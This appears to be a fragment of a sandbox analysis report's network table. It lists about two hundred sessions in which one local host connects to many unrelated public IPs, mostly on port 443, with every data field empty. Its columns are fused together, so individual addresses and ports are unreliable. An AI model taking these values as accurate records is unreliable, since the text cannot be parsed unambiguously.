                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12812192.168.2.1440740181.212.226.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12813192.168.2.1434680143.243.192.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12814192.168.2.1432852180.54.120.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12815192.168.2.1440602180.133.18.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12816192.168.2.1433550156.37.20.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12817192.168.2.1434394223.112.30.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12818192.168.2.1458766140.251.189.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12819192.168.2.1438836130.149.155.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12820192.168.2.145196413.51.9.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12821192.168.2.1438332209.191.219.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12822192.168.2.1449248132.134.200.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12823192.168.2.145625014.160.149.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12824192.168.2.1452894153.79.113.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12825192.168.2.1453076114.206.59.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12826192.168.2.14389805.147.113.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12827192.168.2.144171059.98.242.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12828192.168.2.144315869.95.147.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12829192.168.2.144222291.65.2.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12830192.168.2.143771098.185.76.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12831192.168.2.143843413.54.111.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12832192.168.2.145839278.188.104.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12833192.168.2.1450300208.128.133.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12834192.168.2.145586481.44.95.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12835192.168.2.1436852163.60.76.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12836192.168.2.1457502161.110.179.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12837192.168.2.145167020.51.217.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12838192.168.2.143886052.87.101.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12839192.168.2.143715047.232.49.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12840192.168.2.145746668.70.68.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12841192.168.2.1456946191.244.217.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12842192.168.2.1438410115.223.159.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12843192.168.2.1437854139.253.197.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12844192.168.2.145411296.2.159.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12845192.168.2.1450198142.58.169.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12846192.168.2.1458234185.98.63.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12847192.168.2.1449458205.106.66.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12848192.168.2.1459966111.61.136.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12849192.168.2.1443346113.24.11.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12850192.168.2.143846861.10.2.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12851192.168.2.144787472.81.52.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12852192.168.2.1459970156.204.10.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12853192.168.2.144289236.68.210.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12854192.168.2.144822045.110.13.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12855192.168.2.146094825.40.29.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12856192.168.2.145317418.134.140.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12857192.168.2.145021258.19.245.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12858192.168.2.1458114108.197.70.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12859192.168.2.1457000169.3.200.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12860192.168.2.144170662.178.234.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12861192.168.2.1437694111.33.250.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12862192.168.2.1454126173.18.39.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12863192.168.2.1456650129.199.10.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12864192.168.2.1440660202.6.182.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12865192.168.2.14384145.30.118.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12866192.168.2.144842653.32.156.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12867192.168.2.145744894.162.235.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12868192.168.2.1458832113.69.88.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12869192.168.2.143363659.93.106.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12870192.168.2.1441596106.42.184.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12871192.168.2.1456994148.204.215.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12872192.168.2.143584440.238.126.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12873192.168.2.1457952122.243.165.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12874192.168.2.143639073.217.15.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12875192.168.2.144453678.242.80.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12876192.168.2.1447274175.231.149.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12877192.168.2.145396694.118.92.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12878192.168.2.1436972123.43.95.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12879192.168.2.143424650.80.63.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12880192.168.2.145571842.22.132.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12881192.168.2.143646847.208.43.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12882192.168.2.1452358196.195.230.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12883192.168.2.1460674135.233.14.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12884192.168.2.144263075.172.119.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12885192.168.2.1446244186.104.207.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12886192.168.2.1448588120.12.5.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12887192.168.2.1449572183.248.158.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12888192.168.2.1458548180.250.254.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12889192.168.2.1460312192.33.252.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12890192.168.2.1433914157.85.192.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12891192.168.2.1440480135.88.189.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12892192.168.2.1445390152.165.21.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12893192.168.2.1442238165.28.187.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12894192.168.2.145525299.201.145.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12895192.168.2.1442040172.65.142.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12896192.168.2.1438676168.226.134.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12897192.168.2.1454312159.175.54.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12898192.168.2.143280683.237.99.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12899192.168.2.1457710167.61.44.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12900192.168.2.143628240.207.72.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12901192.168.2.1441198220.221.39.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12902192.168.2.1439752128.202.124.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12903192.168.2.1448390146.90.236.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12904192.168.2.1440632190.167.196.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12905192.168.2.1456078179.50.104.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12906192.168.2.145146652.253.41.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12907192.168.2.1442964107.232.124.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12908192.168.2.1440920209.19.119.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12909192.168.2.1439964126.122.81.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12910192.168.2.143334625.66.8.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12911192.168.2.1448610144.214.228.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12912192.168.2.1445844164.96.241.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12913192.168.2.1457596182.88.18.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12914192.168.2.1443644143.209.101.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12915192.168.2.1441976196.128.224.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12916192.168.2.145271431.255.175.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12917192.168.2.1435132210.242.41.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12918192.168.2.1453882153.92.106.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12919192.168.2.1443830203.251.18.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12920192.168.2.1436588209.32.174.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12921192.168.2.143967852.92.45.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12922192.168.2.144832467.236.113.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12923192.168.2.1451796122.37.165.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12924192.168.2.1434904122.46.144.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12925192.168.2.1438870194.149.232.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12926192.168.2.144888659.47.5.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12927192.168.2.1450722189.35.130.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12928192.168.2.1443496178.16.128.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12929192.168.2.144580298.34.131.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12930192.168.2.145784075.71.55.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12931192.168.2.1457324124.197.43.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12932192.168.2.1448698137.135.159.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12933192.168.2.1454658110.187.44.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12934192.168.2.144993043.142.99.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12935192.168.2.1457168135.31.72.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12936192.168.2.1447486195.146.92.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12937192.168.2.1438426128.119.160.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12938192.168.2.1450862134.168.216.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12939192.168.2.1438988131.248.134.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12940192.168.2.1460058194.118.248.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12941192.168.2.1460484196.153.77.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12942192.168.2.1446318135.5.189.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12943192.168.2.1440802187.3.32.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12944192.168.2.145887817.133.51.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12945192.168.2.144933857.210.119.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12946192.168.2.144565869.92.138.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12947192.168.2.143286217.249.95.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12948192.168.2.1445534170.149.134.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12949192.168.2.1437028107.209.243.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12950192.168.2.1442984134.200.64.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12951192.168.2.145727661.248.211.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12952192.168.2.144871442.99.64.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12953192.168.2.143605086.12.81.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12954192.168.2.145319617.251.48.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12955192.168.2.1442162187.11.204.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12956192.168.2.1452580203.222.162.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12957192.168.2.143402898.51.12.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12958192.168.2.1434332169.97.202.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12959192.168.2.1455460204.104.193.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12960192.168.2.1457588213.241.56.828080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12961192.168.2.145633089.17.190.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12962192.168.2.1453262196.0.208.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12963192.168.2.1454916220.223.121.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12964192.168.2.1445988119.179.127.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12965192.168.2.1447786189.33.103.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12966192.168.2.1438110164.135.38.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12967192.168.2.1460422136.181.185.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12968192.168.2.1438698156.164.247.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12969192.168.2.1457820151.12.58.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12970192.168.2.144819449.218.23.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12971192.168.2.1459002206.37.20.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12972192.168.2.1457146129.3.40.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12973192.168.2.1450064181.156.229.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12974192.168.2.1454070166.249.223.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12975192.168.2.145041669.45.115.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12976192.168.2.1436502110.185.252.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12977192.168.2.14601662.236.170.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12978192.168.2.1453002199.192.194.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12979192.168.2.143426898.119.94.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12980192.168.2.1436984196.167.203.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12981192.168.2.1457142152.224.141.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12982192.168.2.144356243.135.240.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12983192.168.2.145805862.145.80.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12984192.168.2.144343693.13.9.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12985192.168.2.1455740196.241.147.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12986192.168.2.1457086187.164.68.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12987192.168.2.1448934133.255.76.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12988192.168.2.144811254.168.215.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12989192.168.2.1444628101.190.61.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12990192.168.2.1455276205.50.189.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12991192.168.2.1435516165.95.213.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12992192.168.2.144040232.247.70.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12993192.168.2.14558901.176.192.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12994192.168.2.145263412.54.160.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12995192.168.2.1453882157.135.50.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12996192.168.2.144553245.240.18.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12997192.168.2.145490817.10.9.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12998192.168.2.1457716168.42.203.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12999192.168.2.144498499.181.107.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13000192.168.2.145914220.255.149.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13001192.168.2.1437500115.120.151.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13002192.168.2.1454550114.243.118.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13003192.168.2.1438526108.160.82.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13004192.168.2.1438270209.168.33.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13005192.168.2.145728281.248.148.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13006192.168.2.1452740131.119.28.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13007192.168.2.144549099.49.18.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13008192.168.2.1434784219.61.150.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13009192.168.2.145538078.11.127.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13010192.168.2.1435196194.22.7.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13011192.168.2.1447934137.55.105.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13012192.168.2.1436574152.151.213.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13013192.168.2.1442906206.202.36.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13014192.168.2.1437646133.249.8.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13015192.168.2.1433994145.179.35.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13016192.168.2.1451440184.37.70.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13017192.168.2.1435136212.154.234.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13018192.168.2.145458248.84.211.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13019192.168.2.1454462197.222.202.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13020192.168.2.1439534152.64.180.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13021192.168.2.1438916207.34.101.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13022192.168.2.1455252109.153.91.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13023192.168.2.1435914221.222.158.57443
                                                      TimestampBytes transferredDirectionData


